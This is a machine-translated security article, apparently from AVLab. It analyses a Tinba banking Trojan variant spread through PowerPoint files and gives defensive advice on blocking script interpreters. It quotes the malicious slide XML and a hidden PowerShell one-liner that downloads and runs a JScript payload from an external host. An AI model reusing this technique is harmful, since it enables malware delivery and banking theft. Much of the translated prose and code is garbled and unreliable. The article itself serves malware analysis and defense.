A modified version of the banking Trojan Tinba in PowerPoint files

Enthusiasts security of SentinelOne have found a modified version of the Trojan Tinba Bank that in 2015 year spearheaded was in spam and impersonating Polish post, infecting computers Polish Internet users.

Trojan Tinba, also known as Zusy and Tiny Banker, was first discovered in the year 2012. Two years later, in the year 2014, in the laboratory of the company G Data, has been certified to the most attacking viruses, Polish and German users of Internet banking. Newer and improved versions Tinby use the algorithm generate domains (domain generation algorithm – DGA) which makes that malware can still send stolen data and accept remote commands even after elimination of the master the server that it manages.

Trojan Tinba Bank uses a technique to attack man-in-the-browser. In the year 2015 in the very similar attack client "mbank" lost in this way, 40 000 pounds, although his computer was protected by Symantec antivirus software.

A new trojan, a new type of attack

Improved variant Tinby has identified "in-the-wild" PowerPoint file (extension. PPT), which was attached to the order confirmation email. We will not dwell on the way to deliver a Trojan in spam – the most interesting aspect is the way in which the trojan infects device:

-Trojan does not use malicious macro commands (in this way, the malware authors typically use the Powershell interpreter to initialize the harmful events, e.g. download from a remote server and run additional virus) .

-Your role in the process of infecting reduced to the minimum necessary: just point with the mouse on a hyperlink that is in the document:

The interaction occurs after the mouse on a hyperlink.

At this point, the code is triggered:

a:hlinkMouseOver < r:id = "rId2" action = "ppaction://program"/>

The definition of rId2 resides in the ppt/slides/_rels/slide1. rels:

< Relationship Id = "rId2" Type = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target = "powershell% 20-% 20-% 20 NonI NoP-in% 20Hidden% 20-% 22IEX% 20% 20Bypass Exec% 20 (New-Object% 20System system.NET.WebClient). DownloadFile (% 27http% 3A% 27% 2B% 5Bchar% 5 d% 200x2F% 2B% 5Bchar% 5 d% 200x2F% 2B% 27cccn. nl% 27% 2% 5% char 5 B D% 2 0 0x2F% 2 B% 2 7 c. php% 27% 2 c% 5 c% 22% 2 4 env% 3 and temp% 5 C% 22% 5 c .JSE ii)% 3B% 20Invoke-Item% 20% 5 c% 22% 2 4 env% 3 and temp% 5 C ii. jse% 5 c% 22% 22 "TargetMode =" External "/>< Relationship Id =" rId1 "Type =" http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout "Target =".. /slideLayouts/slideLayout1.xml "/>

Go to run your script in the new fail that undetected downloads a file c. php and stores it as ii. jse:

PowerShell-NoP-NonI-Hidden-Exec Bypass "IEX (New-Object System.NET.WebClient System). DownloadFile ('hxxp://cccn.nl/c.php ', ' temp\ii.jse: $env '); Invoke-Item $env: temp\ii.jse ' "

In turn the file ii. jse is treated as JavaScript Executable and is run by the system tool wscript .exe. The next step is already automatically download and run the Trojan to hide the Bank in the form of an EXE file.

How to protect?

This attack uses some interesting techniques which meet only protective solutions with multi-layer real-time protection and protection against malicious scripts.

Users of MS Office 2010 and later will be warned about trying to run the script. Unfortunately, usually with haste and carelessness such messages are ignored.

The authors of the banking Trojan Tinba applied:

  • spam to provide desktop users malicious files
  • Engineering, to persuade or inspire confidence to received messages and attached files,
  • It looks like the common technique to run a Powershell script in the document, PowerPoint,
  • Download malicious JavaScript via Powershell interpreter system
  • run the Trojan banking through the well hidden, a typical downloader written in JavaScript.

In the next week we will publish the detailed test, in which to check the protection security software against similar attacks we used attacks drive-by download.

Role played by malicious scripts run by the interpreter, begins to take on meaning. It is important that when choosing a security product guide not only effective behavioral protection, but (in the era of similar attacks, which witnesses we will increasingly) first of all the mechanisms of low performers with blocking scripts that are started by the system and trust processes: cmd. exe, powershell, wscript, cscript. exe.

Sorry, but in the test for protection against drive-by downloads, most tested by AVLab protection programs allow you to run and execute malicious scripts, which, after all, for the interpreter are simply "code" that you need to run a -without categorizing contained characters on dangerous or safe. In this respect, protection, a significant part of the anti-virus programs is simply unsuited to modern threats that use the secure system processes and digitally signed files by Microsoft.


Effective, proactive protection against viruses, which use wscript .exe (GUI) or cscript. exe (console) to retrieve the target of malicious files, will their total exclusion. If the user does not run any scripts in the system, it's for your own safety, both of these programs can be disabled and if needed reactivated. To do this, simply add the key "Settings" the value of "Enabled" and set to "0":

Hkey_current_user\software\microsoft\windows Script Host\Settings\ "
From that moment on, no virus hiding in the form of Downloader written in Java Script will not caused problems.

In turn deactivating interpreter Powershell. exe is possible for Windows users 10 Pro in the local Group Policy Editor (gpedit. msc -> Windows components). What's more, suse of blockera AppLocker and adding a rule that does not allow running scripts with the file extension. " ps1", as well as the permanent blocking scripts and files are unsigned, will be very good practice.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.